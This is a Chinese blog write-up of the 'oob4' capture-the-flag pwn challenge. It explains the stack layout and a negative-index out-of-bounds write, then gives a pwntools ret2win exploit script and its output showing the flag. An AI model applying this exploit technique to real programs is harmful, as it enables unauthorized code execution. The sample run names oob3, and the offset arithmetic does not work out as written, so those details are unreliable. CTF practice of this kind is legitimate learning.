Pwnctf oob4 Writeup

kazma 成大資安社 創辦人/社長
  2024-02-06 02:50:53 2024-02-06 02:50:53 Created   2024-02-06 03:19:17 2024-02-06 03:19:17 Updated    

oob4

這題執行起來跟 oob2, oob3 一樣(如下所示),但跟 oob3 不同的是他這次把變數都宣告在 main 裡面所以 offset 會不太一樣,但一樣是要 oob write 然後 ret2win,我把 stack 整理在下面來解釋 offset 是怎麼算的:

執行:

1
2
3
4
5
6
└─$ ./oob3
User ID: -4
Nickname: kazma
PIN: 1234
Logging as [kazma] ... Failed
Incorrect PIN code!

stack:

1
2
3
4
5
6
7
8
9
10
11
12
13
rbp-0x5c # input_id (rsp)
rbp-0x58 # input_pw	
rbp-0x54 # index
rbp-0x50 # admin pw 
rbp-0x4c # alice pw
rbp-0x48 # bob pw
rbp-0x44 # guest pw
rbp-0x40 # admin string
rbp-0x38 # alice string
rbp-0x30 # bob string
rbp-0x28 # guest
rbp-0x18 # canary
rbp-0x10

然後附上輸入 Nickname 的 fgets:
r2
因為在 call 完 fgets 之後會 ret 回 main,所以可以把 win 寫在 rsp - 8 的位置,offset 是:
(0x40 - 0x5c - 0x8) / 8 = -5

exploit 如下:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
import warnings
warnings.filterwarnings("ignore", category = BytesWarning)

r = process('./oob4')

win = 0x4007e6
r.sendlineafter(":", "-5")
r.sendlineafter(":", p64(win))
r.sendline("cat flag")
r.interactive()

Result:

1
2
3
4
└─$ python exploit.py
[+] Starting local process './oob4': pid 66498
[*] Switching to interactive mode
 BreakALLCTF{EpKa0zXqkYldHXKknjqB}

Pwned !!!

  • Title: Pwnctf oob4 Writeup
  • Author: kazma
  • Created at : 2024-02-06 02:50:53
  • Updated at : 2024-02-06 03:19:17
  • Link: https://kazma.tw/2024/02/06/Pwnctf-oob4-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwnctf oob4 Writeup
  1. oob4